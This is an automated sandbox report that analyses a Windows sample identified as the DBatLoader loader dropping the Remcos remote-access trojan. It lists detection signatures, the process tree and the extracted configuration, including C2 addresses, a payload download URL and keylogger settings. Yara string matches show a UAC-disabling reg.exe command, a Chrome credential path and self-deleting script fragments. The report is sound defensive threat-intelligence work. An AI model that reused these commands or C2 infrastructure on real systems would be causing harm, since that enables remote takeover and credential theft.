Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SEPTobn3BR.exe

Overview

General Information

Sample name:SEPTobn3BR.exe
renamed because original name is a hash value
Original sample name:ccdcd04a0ffde31366754018598eb02f.exe
Analysis ID:1578037
MD5:ccdcd04a0ffde31366754018598eb02f
SHA1:38492826e8febf5bd7da4f9d8a8379ec7044ca9a
SHA256:63c77a3f6cfa94cbc6a4c0c1475f02520592e58d6a03e8553e77a85a3f03c32f
Tags:exeuser-abuse_ch
Infos:

Detection

Remcos, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
AI detected suspicious sample
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Drops PE files with a suspicious file extension
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queues an APC in another process (thread injection)
Sample is not signed and drops a device driver
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Creation with Colorcpl
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SEPTobn3BR.exe (PID: 7648 cmdline: "C:\Users\user\Desktop\SEPTobn3BR.exe" MD5: CCDCD04A0FFDE31366754018598EB02F)
    • cmd.exe (PID: 7868 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • colorcpl.exe (PID: 7920 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • Emxwenem.PIF (PID: 8112 cmdline: "C:\Users\Public\Libraries\Emxwenem.PIF" MD5: CCDCD04A0FFDE31366754018598EB02F)
    • cmd.exe (PID: 8176 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • colorcpl.exe (PID: 3232 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • Emxwenem.PIF (PID: 816 cmdline: "C:\Users\Public\Libraries\Emxwenem.PIF" MD5: CCDCD04A0FFDE31366754018598EB02F)
    • cmd.exe (PID: 5140 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • colorcpl.exe (PID: 6756 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://www.maan2u.com/docs/233_Emxwenemixg"]}

Threatname: Remcos

{"Host:Port:Password": ["185.174.103.111:2404:1", "185.174.103.111:2468:1", "apostlejob2.duckdns.org:2468:1", "apostlejob2.duckdns.org:2404:1"], "Assigned name": "Big Money 1", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-3W4HX7", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.3812934475.00000000313BF000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000D.00000002.1623286615.000000001ECB8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000000.00000002.1421740936.00000000022C6000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
          0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x691e0:$a1: Remcos restarted by watchdog!
            • 0x69738:$a3: %02i:%02i:%02i:%03i
            • 0x69abd:$a4: * Remcos v
            Click to see the 33 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            13.2.colorcpl.exe.2c00000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              13.2.colorcpl.exe.2c00000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x691e0:$a1: Remcos restarted by watchdog!
              • 0x69738:$a3: %02i:%02i:%02i:%03i
              • 0x69abd:$a4: * Remcos v
              13.2.colorcpl.exe.2c00000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
              • 0x641e4:$str_a1: C:\Windows\System32\cmd.exe
              • 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x6320c:$str_b2: Executing file:
              • 0x64328:$str_b3: GetDirectListeningPort
              • 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x63e30:$str_b7: \update.vbs
              • 0x63234:$str_b9: Downloaded file:
              • 0x63220:$str_b10: Downloading file:
              • 0x632c4:$str_b12: Failed to upload file:
              • 0x642f0:$str_b13: StartForward
              • 0x64310:$str_b14: StopForward
              • 0x63dd8:$str_b15: fso.DeleteFile "
              • 0x63d6c:$str_b16: On Error Resume Next
              • 0x63e08:$str_b17: fso.DeleteFolder "
              • 0x632b4:$str_b18: Uploaded file:
              • 0x63274:$str_b19: Unable to delete:
              • 0x63da0:$str_b20: while fso.FileExists("
              • 0x63749:$str_c0: [Firefox StoredLogins not found]
              13.2.colorcpl.exe.2c00000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
              • 0x63100:$s1: \Classes\mscfile\shell\open\command
              • 0x63160:$s1: \Classes\mscfile\shell\open\command
              • 0x63148:$s2: eventvwr.exe
              5.2.colorcpl.exe.3090000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                Click to see the 24 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
                Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\SEPTobn3BR.exe, ProcessId: 7648, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                Sigma detected: Execution from Suspicious Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Libraries\Emxwenem.PIF" , CommandLine: "C:\Users\Public\Libraries\Emxwenem.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Emxwenem.PIF, NewProcessName: C:\Users\Public\Libraries\Emxwenem.PIF, OriginalFileName: C:\Users\Public\Libraries\Emxwenem.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Users\Public\Libraries\Emxwenem.PIF" , ProcessId: 8112, ProcessName: Emxwenem.PIF
                Sigma detected: Files With System Process Name In Unsuspected Locations
                Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\SEPTobn3BR.exe, ProcessId: 7648, TargetFilename: C:\Windows \SysWOW64\svchost.exe
                Sigma detected: New RUN Key Pointing to Suspicious Folder
                Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Emxwenem.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SEPTobn3BR.exe, ProcessId: 7648, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Emxwenem
                Sigma detected: Parent in Public Folder Suspicious Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Emxwenem.PIF" , ParentImage: C:\Users\Public\Libraries\Emxwenem.PIF, ParentProcessId: 8112, ParentProcessName: Emxwenem.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 8176, ProcessName: cmd.exe
                Sigma detected: Suspicious Creation with Colorcpl
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 7920, TargetFilename: C:\Users\user
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Emxwenem.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SEPTobn3BR.exe, ProcessId: 7648, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Emxwenem
                Sigma detected: Execution of Suspicious File Type Extension
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\Public\Libraries\Emxwenem.PIF" , CommandLine: "C:\Users\Public\Libraries\Emxwenem.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Emxwenem.PIF, NewProcessName: C:\Users\Public\Libraries\Emxwenem.PIF, OriginalFileName: C:\Users\Public\Libraries\Emxwenem.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Users\Public\Libraries\Emxwenem.PIF" , ProcessId: 8112, ProcessName: Emxwenem.PIF

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 7920, TargetFilename: C:\ProgramData\remcos\logs.dat

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-19T08:00:24.178681+010020283713Unknown Traffic192.168.2.749710103.82.231.117443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-19T08:00:30.775132+010020365941Malware Command and Control Activity Detected192.168.2.749725185.174.103.1112404TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-19T08:00:33.888987+010028033043Unknown Traffic192.168.2.749736178.237.33.5080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: SEPTobn3BR.exeAvira: detected
                Antivirus detection for dropped file
                Source: C:\Users\Public\Libraries\Emxwenem.PIFAvira: detection malicious, Label: HEUR/AGEN.1326052
                Found malware configuration
                Source: SEPTobn3BR.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://www.maan2u.com/docs/233_Emxwenemixg"]}
                Source: 0000000D.00000002.1623286615.000000001ECB8000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["185.174.103.111:2404:1", "185.174.103.111:2468:1", "apostlejob2.duckdns.org:2468:1", "apostlejob2.duckdns.org:2404:1"], "Assigned name": "Big Money 1", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-3W4HX7", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\Public\Libraries\Emxwenem.PIFReversingLabs: Detection: 55%
                Multi AV Scanner detection for submitted file
                Source: SEPTobn3BR.exeVirustotal: Detection: 66%Perma Link
                Source: SEPTobn3BR.exeReversingLabs: Detection: 55%
                Yara detected Remcos RAT
                Source: Yara matchFile source: 13.2.colorcpl.exe.2c00000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.colorcpl.exe.3090000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.colorcpl.exe.2990000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.colorcpl.exe.2990000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.colorcpl.exe.3090000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.colorcpl.exe.2c00000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SEPTobn3BR.exe.2b80000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3812934475.00000000313BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1623286615.000000001ECB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3812571420.00000000311A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1526792578.0000000000758000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3812685840.00000000311F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.2755366865.00000000311F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1449264347.000000007E8E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3812571420.00000000311CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SEPTobn3BR.exe PID: 7648, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7920, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 3232, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 6756, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\Public\Libraries\Emxwenem.PIFJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: SEPTobn3BR.exeJoe Sandbox ML: detected
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030C15EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,5_2_030C15EC
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029C15EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,10_2_029C15EC
                Source: SEPTobn3BR.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
                Source: SEPTobn3BR.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: unknownHTTPS traffic detected: 103.82.231.117:443 -> 192.168.2.7:49710 version: TLS 1.2
                Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: easinvoker.pdb source: SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.00000000209F6000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F110000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: easinvoker.pdbGCTL source: SEPTobn3BR.exe, 00000000.00000003.1403060666.0000000021B12000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.00000000209F6000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403060666.0000000021B41000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F110000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1518883152.0000000000843000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1518883152.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007EE000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B858B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02B858B4
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0309838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_0309838E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0309B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,5_2_0309B28E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030AA01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_030AA01B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030987A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_030987A0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030DBA59 FindFirstFileExA,5_2_030DBA59
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0309AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_0309AA71
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030A7AAB FindFirstFileW,FindNextFileW,FindNextFileW,5_2_030A7AAB
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_03097848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,5_2_03097848
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030968CD FindFirstFileW,FindNextFileW,5_2_030968CD
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0309AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_0309AC78
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0299B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,10_2_0299B28E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0299838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_2_0299838E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029AA01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,10_2_029AA01B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029987A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_2_029987A0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029A7AAB FindFirstFileW,FindNextFileW,FindNextFileW,10_2_029A7AAB
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029DBA59 FindFirstFileExA,10_2_029DBA59
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0299AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,10_2_0299AA71
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029968CD FindFirstFileW,FindNextFileW,10_2_029968CD
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_02997848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,10_2_02997848
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0299AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,10_2_0299AC78
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_03096D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_03096D28

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49725 -> 185.174.103.111:2404
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: https://www.maan2u.com/docs/233_Emxwenemixg
                Source: Malware configuration extractorURLs: apostlejob2.duckdns.org
                Source: Malware configuration extractorURLs: apostlejob2.duckdns.org
                Source: Malware configuration extractorIPs: 185.174.103.111
                Source: Malware configuration extractorIPs: 185.174.103.111
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B9E2F8 InternetCheckConnectionA,0_2_02B9E2F8
                Source: global trafficTCP traffic: 192.168.2.7:49725 -> 185.174.103.111:2404
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
                Source: Joe Sandbox ViewASN Name: GIGABIT-MYGigabitHostingSdnBhdMY GIGABIT-MYGigabitHostingSdnBhdMY
